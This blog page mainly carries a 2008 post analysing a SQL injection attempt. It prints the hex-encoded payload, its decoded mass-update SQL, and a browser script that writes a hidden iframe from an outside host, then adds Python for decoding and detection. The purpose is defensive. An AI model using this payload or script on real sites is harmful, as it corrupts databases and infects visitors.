For those we lost, We will not forget 09/11/2001 “Our God given unalienable rights are given to us all as individuals. They tell us what me may do for ourselves, and they are the embodiment of liberty. The so-called rights that government gives to some of us are parcelled out to select groups as classes. They tell us what one class of people may require another to do for them, and they are the very essence of slavery.”
— Perri Nelson, February 9, 2010


A fairly persistent series of hack attempts


Published Wed, Jul 23 2008 9:14 AM
Technorati Tags: Computers and Internet, Blogging, Annoyances

Somebody is trying to hack my site. So far they've been unsuccessful, but they are persistent. How do I know this? Well, every time something goes wrong with the site code (as opposed to something going wrong with my hosting environment), I get an email giving me the details of the failure. That's how I know that someone is trying a SQL Injection attack, and that so far they haven't succeeded. They are persistent though, trying exactly the same routine over and over again.

So, “what is a SQL Injection attack?” It's when the hacker attempts, by modifying the parameters in a query string or form post, to make your site run extra SQL code along with the normal request. A classic example of such an attack tries to gain access to secure areas of a website by modifying the parameters to a user lookup routine. It normally works by taking advantage of the tendency of some developers to use “dynamic SQL” statements that accept unfiltered user input and insert it directly into the statement to be executed.

In any case, the attack being perpetrated here is going after my RSS feeds. They've tried fifteen times using fifteen different IP addresses in the last five hours. Here's the query string they're trying to use…

blogid=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(
0x4445434C415245204054205641524348415228323535292C404320
564152434841522832353529204445434C415245205461626C655F43
7572736F7220435552534F5220464F522053454C45435420612E6E61
6D652C622E6E616D652046524F4D207379736F626A6563747320612C
737973636F6C756D6E73206220574845524520612E69643D622E6964
20414E4420612E78747970653D27752720414E442028622E78747970
653D3939204F5220622E78747970653D3335204F5220622E78747970
653D323331204F5220622E78747970653D31363729204F50454E2054
61626C655F437572736F72204645544348204E4558542046524F4D20
5461626C655F437572736F7220494E544F2040542C4043205748494C
4528404046455443485F5354415455533D302920424547494E204558
45432827555044415445205B272B40542B275D20534554205B272B40
432B275D3D525452494D28434F4E5645525428564152434841522834
303030292C5B272B40432B275D29292B27273C736372697074207372
633D687474703A2F2F7777772E34636E772E72752F6E67672E6A733E
3C2F7363726970743E27272729204645544348204E4558542046524F
4D205461626C655F437572736F7220494E544F2040542C404320454E
4420434C4F5345205461626C655F437572736F72204445414C4C4F43
415445205461626C655F437572736F7220%20AS%20VARCHAR(4000))
;EXEC(@S);--

I've inserted a few line-breaks into that long string so that it doesn't break my blog formatting here. I haven't seen this particular approach before, but if I were using dynamic SQL statements and accepting unfiltered user input to build them before executing them, it would play havoc with my site. Without all of those hexadecimal numbers, here's a simplified version…

blogid=1;DECLARE @S VARCHAR(4000); SET @S=CAST(alongbinarynumber AS VARCHAR(4000));EXEC(@S);--

If it's still not clear enough, here's what they're trying to do. The injected code declares a variable named @S as a large character string, sets its value by casting a binary (hexadecimal) number into string format, and then executes the resulting character string as if it were a SQL statement. The semicolons separate the individual SQL statements and get the extra SQL code past my site's code. The long binary number hides the actual code the hacker is trying to execute. I've decoded that for you here…

-- Cursor over every (table, column) pair where the column is a character or text type
-- (syscolumns.xtype 99 = ntext, 35 = text, 231 = nvarchar, 167 = varchar)
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
    SELECT a.name,b.name
    FROM sysobjects a,syscolumns b
    WHERE a.id=b.id
    AND a.xtype='u'   -- user tables only
    AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
    -- Append the script tag to every value in the current column
    EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.4cnw.ru/ngg.js></script>''')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

So what the hacker is trying to do here is update every single character or text column in every table in my database by tacking the string “<script src=http://www.4cnw.ru/ngg.js></script>” onto the end of every value. Not only is this person trying to hack my database, they're also trying to hack my pages, forcing them to run a script from a Russian web site every time you load one of them.
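To make the two halves of this concrete, here is an added example (my own Python, not this blog's code and not the blogging platform's) that takes the query string quoted above, recovers the SQL hidden in the hexadecimal literal, and then contrasts the dynamic-SQL lookup such an attack depends on with a parameterized query. The table and column names (posts, blogid, title) and the use of an in-memory SQLite database in place of SQL Server are assumptions made for the demo.

```python
"""Added example, not the blog's own code: decode the hex-wrapped SQL from the
query string quoted in the post, and contrast dynamic SQL with a parameterized
query.  posts/blogid/title and the use of sqlite3 instead of SQL Server are
assumptions made for this demo."""
import re
import sqlite3
from urllib.parse import unquote

# The attacker's query string exactly as quoted in the post, line breaks removed.
HOSTILE_QUERY_STRING = (
    "blogid=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST("
    "0x4445434C415245204054205641524348415228323535292C404320"
    "564152434841522832353529204445434C415245205461626C655F43"
    "7572736F7220435552534F5220464F522053454C45435420612E6E61"
    "6D652C622E6E616D652046524F4D207379736F626A6563747320612C"
    "737973636F6C756D6E73206220574845524520612E69643D622E6964"
    "20414E4420612E78747970653D27752720414E442028622E78747970"
    "653D3939204F5220622E78747970653D3335204F5220622E78747970"
    "653D323331204F5220622E78747970653D31363729204F50454E2054"
    "61626C655F437572736F72204645544348204E4558542046524F4D20"
    "5461626C655F437572736F7220494E544F2040542C4043205748494C"
    "4528404046455443485F5354415455533D302920424547494E204558"
    "45432827555044415445205B272B40542B275D20534554205B272B40"
    "432B275D3D525452494D28434F4E5645525428564152434841522834"
    "303030292C5B272B40432B275D29292B27273C736372697074207372"
    "633D687474703A2F2F7777772E34636E772E72752F6E67672E6A733E"
    "3C2F7363726970743E27272729204645544348204E4558542046524F"
    "4D205461626C655F437572736F7220494E544F2040542C404320454E"
    "4420434C4F5345205461626C655F437572736F72204445414C4C4F43"
    "415445205461626C655F437572736F7220%20AS%20VARCHAR(4000))"
    ";EXEC(@S);--"
)

HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]+)")


def param_value(query_string: str, name: str = "blogid") -> str:
    """Return the URL-decoded value of one parameter, splitting pairs on '&' only.
    parse_qs is avoided on purpose: older Pythons also split on ';', which would
    hide everything after the first semicolon of the payload."""
    for pair in query_string.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote(value)
    return ""


def decode_hex_payload(value: str) -> str:
    """Turn the 0x... literal inside CAST(0x... AS VARCHAR) back into text."""
    match = HEX_LITERAL.search(value)
    if not match:
        return ""
    return bytes.fromhex(match.group(1)).decode("ascii", errors="replace")


def build_dynamic_sql(value: str) -> str:
    """The vulnerable pattern the post describes: the raw parameter is pasted into
    the statement text, so the ';'-separated statements ride along with it."""
    return "SELECT title FROM posts WHERE blogid=" + value


def lookup_parameterized(conn: sqlite3.Connection, value: str) -> list:
    """The safe pattern: the whole string is bound as a single value and compared
    against blogid; it is never parsed as SQL, so no rows match the hostile value."""
    return conn.execute("SELECT title FROM posts WHERE blogid=?", (value,)).fetchall()


def demo_connection() -> sqlite3.Connection:
    """Constructed sample data for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (blogid INTEGER, title TEXT)")
    conn.execute("INSERT INTO posts VALUES (1, 'A fairly persistent series of hack attempts')")
    return conn


if __name__ == "__main__":
    hostile = param_value(HOSTILE_QUERY_STRING)
    print("hidden SQL:", decode_hex_payload(hostile))
    print("text the vulnerable code would send:", build_dynamic_sql(hostile))
    conn = demo_connection()
    print("parameterized, hostile value:", lookup_parameterized(conn, hostile))
    print("parameterized, normal value:", lookup_parameterized(conn, "1"))
```

The dynamic-SQL string is only built, never executed: on SQL Server that text is four statements, and the engine would run all of them. The parameterized version hands the same hostile string to the driver as a value, so it is compared against the blogid column and simply matches nothing. Decoding the hexadecimal literal is the quickest way to see what an intercepted payload like this one actually does before deciding whether any of your columns were touched.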

Here's the script they're trying to make my site force your browser to execute…

window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){
    var cookieString = document.cookie;
    var start = cookieString.indexOf("vrcgoo=");
    if (start != -1){}else{
        var expires = new Date();
        expires.setTime(expires.getTime()+9*3600*1000);
        document.cookie = "vrcgoo=update;expires="+expires.toGMTString();
        try{
            document.write("<iframe src=http://cvsr.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
        }
        catch(e) {
        };
    }
}

So they're trying to use the script engine in your browser to store a tracking cookie on your machine and insert an IFRAME into the HTML your browser shows. The source document for that IFRAME comes from “http://cvsr.ru/cgi-bin/index.cgi?ad”. I don't think it's necessary to dig into this much further. It's almost a sure bet that downloading that document in your browser will infect your computer with some sort of virus, and that you'd never see it coming unless you have antivirus software that pops up an alert immediately. Since the IFRAME is set to have zero width, zero height, and no border, you wouldn't see the IFRAME or the document. You'd only see the effects, and they're sure to be nasty.
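If you suspect your own pages have already been seeded this way, the two tell-tale signs described above are easy to check for in rendered HTML: a script tag whose src points at a host that isn't yours, and an IFRAME with zero width or height. The following scanner is an added example in Python (mine, not the blog's or any platform's code); the sample page and the allow-listed host “www.example.com” are constructed for the demo.

```python
"""Added example, not the blog's own code: scan rendered HTML for external
<script src=...> tags and zero-sized IFRAMEs.  The sample page and the
"www.example.com" allow-list are constructed for the demo."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class InjectedMarkupScanner(HTMLParser):
    """Collect script sources on foreign hosts and hidden iframes from a page."""

    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = {h.lower() for h in own_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # Unquoted attribute values (as in the injected tag) are still parsed here.
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag == "script" and "src" in attrs:
            host = urlparse(attrs["src"]).netloc.lower()
            # Relative URLs have no host and are treated as the site's own.
            if host and host not in self.own_hosts:
                self.findings.append(("external-script", attrs["src"]))
        elif tag == "iframe":
            hidden = (attrs.get("width", "").strip() == "0"
                      or attrs.get("height", "").strip() == "0")
            if hidden:
                self.findings.append(("hidden-iframe", attrs.get("src", "")))


def scan_html(html: str, own_hosts) -> list:
    """Return [(kind, src), ...] for every suspicious tag found in the page."""
    scanner = InjectedMarkupScanner(own_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a post title with the tag from the decoded SQL tacked on,
# a legitimate local script, and the IFRAME the hostile script would write.
SAMPLE_PAGE = """<html><body>
<h1>A fairly persistent series of hack attempts<script src=http://www.4cnw.ru/ngg.js></script></h1>
<script src="/scripts/site.js"></script>
<iframe src=http://cvsr.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>
</body></html>"""

if __name__ == "__main__":
    for kind, src in scan_html(SAMPLE_PAGE, ["www.example.com"]):
        print(kind, src)
```

Running it over a saved copy of each page (or over the text columns of a database dump) gives a quick inventory of what, if anything, was appended; the host allow-list is the only thing to adapt to your own site.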

My fellow bloggers, if my site is under this sort of attack, you can bet that yours is too. Protect your site visitors! Make sure you're running the latest version of your blogging platform.


Trackposted to third world county, Allie is Wired, Woman Honor Thyself, DragonLady's World, The World According to Carl, The Pink Flamingo, Leaning Straight Up, Cao's Blog, Democrat=Socialist, Dumb Ox Daily News, Conservative Cat, and Right Voices, thanks to Linkfest Haven Deluxe.



Wednesday Hero - 1st LT. Frank B. Walkup, IV


Published Wed, Jul 23 2008 12:01 AM

This Week's Hero Was Suggested By Toni

1st LT. Frank B. Walkup, IV
23 years old from Woodbury, Tennessee
2nd Battalion, 35th Infantry Regiment, 3rd Brigade Combat Team, 25th Infantry Division
June 16, 2007
U.S. Army

Toni already has a great post up on her site, so I'll just link to it.

These brave men and women sacrifice so much in their lives so that others may enjoy the freedoms we get to enjoy every day. For that, I am proud to call them Hero. We Should Not Only Mourn These Men And Women Who Died, We Should Also Thank God That Such People Lived

This post is part of the Wednesday Hero Blogroll. For more information about Wednesday Hero, or if you would like to post it on your site, you can go here.


Wednesday Heroes is published every Wednesday by Indian Chris. None of this material originates with me, but I'm proud to host it.

